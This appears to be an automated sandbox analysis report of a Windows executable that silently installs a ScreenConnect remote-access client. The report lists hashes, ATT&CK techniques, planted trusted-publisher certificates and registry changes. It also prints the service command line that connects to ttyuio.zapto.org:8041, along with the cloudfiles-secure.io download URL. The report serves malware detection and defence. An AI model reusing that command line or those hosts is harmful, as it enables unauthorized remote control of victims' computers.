30f954b33fe37f347cc504ddad29f13c36bad08a2c6caa25f2c1c36e41527623

Analysis

max time kernel
120s
max time network
136s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
14/10/2024, 17:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

30f954b33fe37f347cc504ddad29f13c36bad08a2c6caa25f2c1c36e41527623.exe
Size

81KB
MD5

4120d7d59086b91b3a0bb32838c99ac1
SHA1

8f156d108b4589dfaa4928fca5a2df96ddf3e3b3
SHA256

30f954b33fe37f347cc504ddad29f13c36bad08a2c6caa25f2c1c36e41527623
SHA512

2d1bca263fbb43c10f5852d570d345cb68c7a7985ee997e67b7fcdaf80114312567c7298b0f4b7917118df99e8ecbc77ddd1ce24f93647f7c3043c1306d22344
SSDEEP

1536:xoG6KpY6Qi3yj2wyq4HwiMO10HVLCJRpsWr6cdaxPBJYYD7UxD2Q:renkyfPAwiMq0RqRfbaxZJYYD7Q

Score

8^/10

discovery persistence

Malware Config

Signatures

Manipulates Digital Signatures 1 TTPs 2 IoCs

Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 0300000001000000140000007b0f360b775f76c94a12ca48445aa2d2a875701c2000000001000000b4060000308206b030820498a003020102021008ad40b260d29c4c9f5ecda9bd93aed9300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3231303432393030303030305a170d3336303432383233353935395a3069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e6720525341343039362053484133383420323032312043413130820222300d06092a864886f70d01010105000382020f003082020a0282020100d5b42f42d028ad78b75dd539591bb18842f5338ceb3d819770c5bbc48526309fa48e68d85cf5eb342407e14b4fd37843f417d71edaf9d2d5671a524f0ea157fc8899c191cc81033e4d702464b38de2087d347d4c8057126b439a99f2c53b1ff2efcb475a13a64cb3012025f310d38bb2fb08f08ae09d09c065a7fa98804935873d5119e8902178452ea19f2ce118c21accc5ee93497042328ffbc6ea1cf3656891a24d4c8211485268de10bd14575de8181365c57fb24f852c48a4568435d6f92e9caa0015d137fe1a0694c27cc8ea1b32e6cac2f4a7a3030e74a5af39b6ab6012e3e8d6b9f731e1dcade418a0d8c1234747b3a10f6ea3ab6d9806831bb76a672dd2bd441a9210818fb03b09d7c79b325ac2ff6a60548b49c193ede1b45ce06feb26f98cd5b2f93810e6eace91f5bed3fb6f9361345cbc93452883362a66285fb073ce8b262506b283d45cf615194ced62e05e33f2e8e8ec0aa7b0032b91b23679bef7ad081e75a665ccbbe34850f377911afedb50a246c8615898f57c02163c8328ad3986ecd4b70d53d0f847e675308dec30937614a65b4b5d74614d3f129176debf58cb72102941f0d5c56d267668114113589adc262b01f4894d59db78cf814a3e40475fc98150738510232159608a6454c1cc211ae838197c661ccd78384530994fff634f4cbbaa0d0853417c583d47b3fab6ec8c320902cc6c3c0c56110203010001a38201593082015530120603551d130101ff040830060101ff020100301d0603551d0e041604146837e0ebb63bf85f1186fbfe617b088865f44e42301f0603551d23041830168014ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300e0603551d0f0101ff04040302018630130603551d25040c300a06082b06010505070303307706082b06010505070101046b3069302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304106082b060105050730028635687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63727430430603551d1f043c303a3038a036a0348632687474703a2f2f63726c332e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63726c301c0603551d20041530133007060567810c01033008060667810c010401300d06092a864886f70d01010c050003820201003a23443d8d0876ee8fbc3a99d356e0021aa5f84834f32cb6e67466f79472b100caaf6c302713129e90449f4bfd9ea37c26d537bc3a5d486d95d53f49f427bb16814550fd9cbdb685e0767e3771cb22f75aaa90cff5936ae3eb20d1d55079889a8a8ac1b6bda148187edcd8801a111918cd61998156f6c9e376e7c4e41b5f43f83e94ff76393d9ed499cf4add28eb5f26a1955848d51afed7273ffd90d17686dd1cb0605cf30da8eee089a1bd39e1384eda6ebb369dfbe521535ac3cae96af1a23edb43b833c84f38149299f5ddce546dd95d02141f40337c03e295b2c221757352cb46d8c4341ca2a54b8dcd6f76372c853f1ace26e918be9007b0437f9588208270f0cccaeffd29355c1f893855f7378a8b09a1cb0be9311aff2e195c3971e1be9ca70a06d62667b792e64e5fde7aac49cf2ea47492addb3ca49c861fe3c1561b2b23ff8fb5ea887b706be6a0bafd3a3f45a6c4e81691528b41c048844b964dab4440e38df01528ceedf11856072a2f10c40c08643c338fae288c3ccb8f880b0dbf3bf4ce1e7b8eefb5ebcbb7f07713e6e7283fac12aea52f226c41f9825c1566cc6c0ecac586c3f626330c074ba0d307026a6a4030484b34a85120bbad1b8508e2590d6dca05502bea4a1c9ea5fda0a71f0674e7f2d65290fdaf854821f9573bb49c03ed8645f4b4616ebf68e2266086eac8afa9fe941de7631b3a8656784e	30f954b33fe37f347cc504ddad29f13c36bad08a2c6caa25f2c1c36e41527623.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579\Blob = 0300000001000000140000004c2272fba7a7380f55e2a424e9e624aee1c145792000000001000000640700003082076030820548a00302010202100b9360051bccf66642998998d5ba97ce300d06092a864886f70d01010b05003069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e67205253413430393620534841333834203230323120434131301e170d3232303831373030303030305a170d3235303831353233353935395a3065310b30090603550406130255533110300e06035504081307466c6f72696461310e300c0603550407130554616d706131193017060355040a1310436f6e6e656374776973652c204c4c433119301706035504031310436f6e6e656374776973652c204c4c4330820222300d06092a864886f70d01010105000382020f003082020a0282020100ec489826d08d2c6de21b3cd3676db1e0e50cb1ff75ff564e9741f9574aa3640aa8297294a05b4db68abd0760b6b05b50ce92ff42a4e390be776a43e9961c722f6b3a4d5c880bcc6a61b4026f9137d36b2b7e9b86055876b9fa860dbcb164fe7f4b5b9de4799ae4e02dc1f0bee01e5d032933a2827388f8db0b482e76c441b1bd50909ef2023e1fb62196c994ce052266b28cd89253e6416044133139764db5fc45702529536bf82c775f9ec81fa27dc409530325f40cdef95b81b9ce0d42791cee72e7bd1b36c257b52257c65a28970e457513989434bfc239e2992b193e1b3cc3f11ccdd1d26d4ec9845099ab913906a42069af999c0071169b45a2ea1aa666f1904e8acb05e1823a359a291fd46b4ef7aed5935bb6ab17ebf077210726930c90f01761d6544a94e8fa614cc41d817eec734b1c3d3afb7c58fb256f0c09edc1459bddbff9940ed1958570265d67af79a9b6a16affd70fc6328c9810d5dc186e39af6fbcad49a270f237e6bcd5de0bc014bc3179cd79776591340311a42ca94f33416c2e01b59bd1d71de86ace6716bc90b2d7695d155039aa08fbac19a4d93fb784230a20a485287a16355645fc09142c602d140fa046b7bfd75328184ff7bdf8f9e0d65e6201c8d242931047f59bd328ac353777ccefa60408887b84fc3631301463461a1d73c0b5cc74d6d82905ddf923bdbab027a311cc38d3fa16f639a50203010001a382020630820202301f0603551d230418301680146837e0ebb63bf85f1186fbfe617b088865f44e42301d0603551d0e04160414338ce10a6e06d9c6ed0bc6cae736cefb8188646a300e0603551d0f0101ff04040302078030130603551d25040c300a06082b060105050703033081b50603551d1f0481ad3081aa3053a051a04f864d687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c3053a051a04f864d687474703a2f2f63726c342e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c303e0603551d20043730353033060667810c0104013029302706082b06010505070201161b687474703a2f2f7777772e64696769636572742e636f6d2f43505330819406082b06010505070101048187308184302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d305c06082b060105050730028650687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820201000ad79f00cf4984864c8981ecce8718aa875647f6a74608c968e16568c7aa9d711ed7341676038067f01330c91621b27a2a8894c4108c268162a31f13f9757a7d6bb3c6f19bf27c3a29896d712d85873627d827cd6471761444fabf1d31e903f791143c5b4ce5e7444aacba36d759aeba3069d195226755cbc675aa747f77596c53c96e083c45bba24479d6845eea9f2b28ba29b4dcf0bcf14aa4ce176c24e2c1b8fec3ee16e1c086db6fda97388859e83be65c03f701395b78b842c6dd1533ef642cca6fe50f6337d3f2dfedd8b28f2b28e0c98edd2151392e7cc75489f48859f1de14c81b306eb50eed7bb78be30eaada76767c4ca523a11eec5a2372d6122926ab1801a6a6778e9504791487ee47d4577154988802070f80fc535957658f954cd083546c5afb5a6567b6761275f5db20f70ab86feef94c7cfc65369d325121b69a82399bc7dc1962416f0f05cf1eee64d495a3527e464e2c68da0187093f97b673e43dddbcc067e00713f1565fcff8c3772d44b40a04e600644f22a990345f9a6b5b52963e82c81a0ce91d43a230f67b37d8debda40ea3d59d305e18adc1976516c12a8ba2bca24143b12e9527b4dca58872aa9b3a8c6ac563fc2dc02bf51be889516d35a4ba9d062417b5bdcc50ba945fae26b60d6aec03984798a6a21d3ff793cc0849e81ed55b8027411c50db776ae8feef2fdc2dafb04345261dedc054	30f954b33fe37f347cc504ddad29f13c36bad08a2c6caa25f2c1c36e41527623.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\ScreenConnect Client (75fe13cf-a31a-4bf4-ba4f-4babb113f0b0)\ImagePath = "\"C:\\Users\\Admin\\AppData\\Local\\Apps\\2.0\\R9ZOQ7VJ.EZ4\\EQDZ0GRC.7O2\\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\\ScreenConnect.ClientService.exe\" \"?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=75fe13cf-a31a-4bf4-ba4f-4babb113f0b0&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAA3p0QovQE8UCvauwThin0fgAAAAACAAAAAAAQZgAAAAEAACAAAADsYkyp10OHqM4rBBkbhaz1SfhIvXjjneFDn8af0SAMnAAAAAAOgAAAAAIAACAAAACMt24DTQtL3qx3EI20W4ePqpdaIe44MxJJ18wvzSCQqaAEAACnmX69m9qP8zrc4mvxjBkJzyB0BF%2fTz%2ffFvk99fT7b91wOi%2bupSopUOBmMBMArcJJk%2fjcER2J%2bVgNu24gEjMrcvjDDW3YU5aIvdREYZClrzscgN0lBBVjST37EqtE8d%2bdpV3IigX2NwLG0FHUgbOd6Zb%2bxNb2osRRNmkvSckyuZohFShnqaDXFUQh2dJex3mQlMYukpgA6oD%2bGgKjTvOKeoz0674dl03cqbfVhTc5mxvWMOoZIdtqPB%2fY%2bkpsVAiptzsFKbPmcIxuNM8q4h6%2fE4VcOBPKeyKQ9%2bBi1LTEsmIQOqb%2bH3O1W5aMqX5bbXh4dpCp6yHxAGbQ%2fYkvmX9Pgdyyjy7m29oIcVvmg5k6lKir9BYjrHY75VMDVjnpucWF1hKxo4Pt1A4tLhQ9Jv%2fgzX%2fPg17Qkl2lF7Ty2YVb%2fxujuiaYYjj5U%2ffntiSf6XJuFYE%2b4nPfRr0Gre%2bpNSA5w2Gcv3%2bKsfjeKuPge4kmV3Lb4Qb1Qk0bdDN4ok4kPUT0q9mR5hx%2fPjn1nYFO2a9GxeM14fQWk6q%2f6sKOdCqPwMuYDBQGHEioB%2fVxjeHFXEJHuNj5Y39qQ5wPvdNNM7rBJ5TNCWpdRJYwAj993K2K9q1HhLtAmOq8WH14%2b%2bqfQsIindOt%2b7rw3R7GvPCavzhfYim2SMlltz0kNAoVEQiGjbhQuw2nejBCF78p3b2wtLUDufbWeIkqVp%2fCRkawWyLrygsKl7gMkZSEQ101ojb89ZlxJke0iq5xjL4opyb3T8yeqnmIxhEUotE422f6UnuCZ8Y1cHOQ8lpQnpV2PH2O6oNVfl833000VzEe5VeyDfU6KLGh6uU3BG8ivYEKtmJ1C0V7tJnyr4STna%2bleTbjxtiVZ4hQwyRf8eQp%2fE5Qw%2fWQTLrPgb74JHSIL5pgAASnrtyX0YlgAm9weW%2ficyyu76%2bWHtnz0PitwZs1jTBZKQE7NDpl3ZOUqaNLw2SvsONTaP5wdsnghDsLWMan3Iktmwn73Kg8acqLsmbuEVF62buHOisXehx9J8L1LJ%2bLeN%2bXWphNQZx6QXz%2b%2fb826pQZnhcFnGz8fIco8WUyqjb%2bgguBJy2DLcLDZnBPcoXHsgA%2ff%2bJLdK8dNY8iTwZyZwSaLUwZuJa0dNOPj1ZfZumAaRD067RpZUpNVKT2H0k7NN2%2fSBNdYu%2bj34yJanuh73%2fsHRPpmYH5I6NxNaiIFiKAfXpB6Y7MEoT3BZsrjnI7cOjUj8tm2bZi5Y0cj%2fVkFT1Vy2bRRhj%2fcS4SN3WRPV0FoMNqHDGjqdFIQnsB8%2bcjFZH4RcRsBwEu%2f8Mmnw0PqZtk6TEWx66YaTH4OmNDCHq%2bxVtFScx0vXnCGLLYJUAdIGd6z64epfqK9Gjl5O3uZeAol4PhZNHz5oi3JGZmyr9XILUgAN62LJz8aW1bLR1Yf8TuXCmrvew7EXRgh1nptjx975Oxg5VTBlyDNXkBxKDSTGOM%2fCL7OX9HfDdPqWJyiW0fPkO2DBodd84jbTPxe%2b%2fV7ayK2ED8zRpMmUbIzVW0B6Yd09GThyAd5k8FN4CCoOD1h1FqlJBqXJeJU1Jkp0Gf49kAAAACGFy7S9BUB5%2fBiQtvegFSpFCQ%2frthAS%2fjArvGZUMEdOuzsqiekdUdeBHEBS1vDRNIyt7T%2f3lajLPkSVDQBuSXo&r=&i=Untitled%20Session\" \"1\""	ScreenConnect.ClientService.exe

Downloads MZ/PE file

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\user.config	ScreenConnect.WindowsClient.exe
File opened for modification	C:\Windows\system32\user.config	ScreenConnect.WindowsClient.exe

Executes dropped EXE 4 IoCs

pid	Process
2820	ScreenConnect.WindowsClient.exe
1740	ScreenConnect.ClientService.exe
1416	ScreenConnect.ClientService.exe
1076	ScreenConnect.WindowsClient.exe

Loads dropped DLL 16 IoCs

pid	Process
1740	ScreenConnect.ClientService.exe
1740	ScreenConnect.ClientService.exe
1740	ScreenConnect.ClientService.exe
1740	ScreenConnect.ClientService.exe
1740	ScreenConnect.ClientService.exe
1740	ScreenConnect.ClientService.exe
1416	ScreenConnect.ClientService.exe
1416	ScreenConnect.ClientService.exe
1416	ScreenConnect.ClientService.exe
1416	ScreenConnect.ClientService.exe
1416	ScreenConnect.ClientService.exe
1416	ScreenConnect.ClientService.exe
1416	ScreenConnect.ClientService.exe
1416	ScreenConnect.ClientService.exe
1416	ScreenConnect.ClientService.exe
1416	ScreenConnect.ClientService.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	30f954b33fe37f347cc504ddad29f13c36bad08a2c6caa25f2c1c36e41527623.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ScreenConnect.ClientService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ScreenConnect.ClientService.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	ScreenConnect.ClientService.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\SizeOfStronglyNamedComponent = b021010000000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\DigestMethod = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\lock!060000001eab760ffc090000ec040000000000000000000 = 30303030303966632c30316462316536303330363739346630	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gc_scre..tion_d0aeae01f8c2b957	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb = 680074007400700073003a002f002f0063006c006f0075006400660069006c00650073002d007300650063007500720065002e0069006f002f00420069006e002f00530063007200650065006e0043006f006e006e006500630074002e0043006c00690065006e0074002e006100700070006c00690063006100740069006f006e003f0065003d0053007500700070006f0072007400260079003d0047007500650073007400260068003d00740074007900750069006f002e007a006100700074006f002e006f0072006700260070003d003800300034003100260073003d00370035006600650031003300630066002d0061003300310061002d0034006200660034002d0062006100340066002d0034006200610062006200310031003300660030006200300026006b003d0042006700490041004100410043006b004100410042005300550030004500780041004100670041004100410045004100410051004300700044004c004a00620042003200550043004a0051005300540037004a00250032006200650041004c00340053005200780042004e00390046006e00470044006d007a0075005300530065002500320066006a0048002500320062006e004b00420065004f0051004600480051002500320062004300720033004c0079007000440031004b0053006200310037006f0052005700500034007a0056004800790037004200540035003800350079007a00490064007400450073004c004f0051004a0047005600550077007a006500490046005700610041004b0077004b006600420073004800470025003200660068003800470059005600740038003500570031006f0049005600750044003000680065004a006d004a00740071004500640063004f006a005800760058005000440034006f004a007500510048006f00710068004200620059004c006f0053006e0073006200660072005400500030005200300034003000250032006200630066006b0043004e0073006c007600750066003000310063006e0073006200630041006500790055004500460052004b0049007a0025003200620038006f00300059004a0077007200690078004500360076006400520062003500630078006e00250032006200610075005600330036006d0039003200250032006200360025003200660068004e0043003500730052007a004d00340035004800720031004600550034003700770041003400720041005200610038004f006e00410043005900610066007000330032006a00450033007400320043006d003700450045006b004d00740025003200620053003600480057004b00670061005a004d007000300056004c006b004200670050007700330057006e005000380035006600680073006c0059004e00390055007a00330045005a007400730042006e002500320066003900370043004600450032006a00530041007600340025003200620072006400670049006d00410033006e0061003800260072003d00260069003d0055006e007400690074006c0065006400250032003000530065007300730069006f006e000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\identity = 53637265656e436f6e6e6563742e57696e646f77732c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975\identity = 53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\SizeOfStronglyNamedComponent = e04f040000000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975\lock!10000000baab760f040b0000f4020000000000000000000 = 30303030306230342c30316462316536303335663234383730	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\scre..tion_25b0fbb6ef7eb = 3c004100700070006c00690063006100740069006f006e00540072007500730074002000760065007200730069006f006e003d002200310022000d000a00460075006c006c004e0061006d0065003d002200680074007400700073003a002f002f0063006c006f0075006400660069006c00650073002d007300650063007500720065002e0069006f002f00420069006e002f00530063007200650065006e0043006f006e006e006500630074002e0043006c00690065006e0074002e006100700070006c00690063006100740069006f006e002300530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f007700730043006c00690065006e0074002e006100700070006c00690063006100740069006f006e002c002000560065007200730069006f006e003d00320034002e0032002e00310030002e0038003900390031002c002000430075006c0074007500720065003d006e00650075007400720061006c002c0020005000750062006c00690063004b006500790054006f006b0065006e003d0032003500620030006600620062003600650066003700650062003000390034002c002000700072006f0063006500730073006f0072004100720063006800690074006500630074007500720065003d006d00730069006c002f00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f007700730043006c00690065006e0074002e006500780065002c002000560065007200730069006f006e003d00320034002e0032002e00310030002e0038003900390031002c002000430075006c0074007500720065003d006e00650075007400720061006c002c0020005000750062006c00690063004b006500790054006f006b0065006e003d0032003500620030006600620062003600650066003700650062003000390034002c002000700072006f0063006500730073006f0072004100720063006800690074006500630074007500720065003d006d00730069006c002c00200074007900700065003d00770069006e003300320022000d000a00540072007500730074006500640054006f00520075006e003d002200740072007500650022000d000a0050006500720073006900730074003d002200740072007500650022003e000d000a003c00440065006600610075006c0074004700720061006e0074003e000d000a003c0050006f006c00690063007900530074006100740065006d0065006e0074002000760065007200730069006f006e003d002200310022003e000d000a003c005000650072006d0069007300730069006f006e00530065007400200063006c006100730073003d002200530079007300740065006d002e00530065006300750072006900740079002e005000650072006d0069007300730069006f006e0053006500740022000d000a00760065007200730069006f006e003d002200310022000d000a00490044003d00220043007500730074006f006d0022000d000a00530061006d00650053006900740065003d002200730069007400650022000d000a0055006e0072006500730074007200690063007400650064003d002200740072007500650022000d000a0078006d006c006e0073003a00610073006d00760031003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a00610073006d002e007600310022000d000a0078006d006c006e0073003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a00610073006d002e007600320022000d000a0078006d006c006e0073003a00610073006d00760032003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a00610073006d002e007600320022000d000a0078006d006c006e0073003a007800730069003d00220068007400740070003a002f002f007700770077002e00770033002e006f00720067002f0032003000300031002f0058004d004c0053006300680065006d0061002d0069006e007300740061006e006300650022000d000a0078006d006c006e0073003a0063006f002e00760031003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a0063006c00690063006b006f006e00630065002e007600310022000d000a0078006d006c006e0073003a00610073006d00760033003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a00610073006d002e007600330022000d000a0078006d006c006e0073003a0064007300690067003d00220068007400740070003a002f002f007700770077002e00770033002e006f00720067002f0032003000300030002f00300039002f0078006d006c006400730069006700230022000d000a0078006d006c006e0073003a0063006f002e00760032003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a0063006c00690063006b006f006e00630065002e007600320022003e000d000a003c0049005000650072006d0069007300730069006f006e00200063006c006100730073003d002200530079007300740065006d002e004e00650074002e005700650062005000650072006d0069007300730069006f006e002c002000530079007300740065006d002c002000560065007200730069006f006e003d0032002e0030002e0030002e0030002c002000430075006c0074007500720065003d006e00650075007400720061006c002c0020005000750062006c00690063004b006500790054006f006b0065006e003d00620037003700610035006300350036003100390033003400650030003800390022000d000a00760065007200730069006f006e003d002200310022003e000d000a003c0043006f006e006e006500630074004100630063006500730073003e000d000a003c0055005200490020007500720069003d00220028006800740074007000730029003a002f002f0063006c006f0075006400660069006c00650073005c002d007300650063007500720065005c002e0069006f002f002e002a0022002f003e000d000a003c002f0043006f006e006e006500630074004100630063006500730073003e000d000a003c002f0049005000650072006d0069007300730069006f006e003e000d000a003c002f005000650072006d0069007300730069006f006e005300650074003e000d000a003c002f0050006f006c00690063007900530074006100740065006d0065006e0074003e000d000a003c002f00440065006600610075006c0074004700720061006e0074003e000d000a003c004500780074007200610049006e0066006f00200044006100740061003d00220030003000300031003000300030003000300030004600460046004600460046004600460030003100300030003000300030003000300030003000300030003000300030003000430030003200300030003000300030003000350037003500330037003900370033003700340036003500360044003200450035003700360039003600450036003400360046003700370037003300320045003400360036004600370032003600440037003300320043003200300035003600360035003700320037003300360039003600460036004500330044003300340032004500330030003200450033003000320045003300300032004300320030003400330037003500360043003700340037003500370032003600350033004400360045003600350037003500370034003700320036003100360043003200430032003000350030003700350036003200360043003600390036003300340042003600350037003900350034003600460036004200360035003600450033004400360032003300370033003700360031003300350036003300330035003300360033003100330039003300330033003400360035003300300033003800330039003000350030003100300030003000300030003000330030003500330037003900370033003700340036003500360044003200450035003300360035003600330037003500370032003600390037003400370039003200450035003000360046003600430036003900360033003700390032004500340031003700300037003000360043003600390036003300360031003700340036003900360046003600450035003400370032003700350037003300370034003400350037003800370034003700320036003100340039003600450036003600360046003000310030003000300030003000300031003800370032003600350037003100370035003600350037003300370034003700330035003300360038003600350036004300360043003400390036004500370034003600350036003700370032003600310037003400360039003600460036004500300030003000310030003200300030003000300030003000300030003000420022002f003e000d000a003c002f004100700070006c00690063006100740069006f006e00540072007500730074003e000d000a000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb = 460061006c00730065000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\implication!scre..tion_25b0fbb6ef7eb094_0018.0002_b6 = 68747470733a2f2f636c6f756466696c65732d7365637572652e696f2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
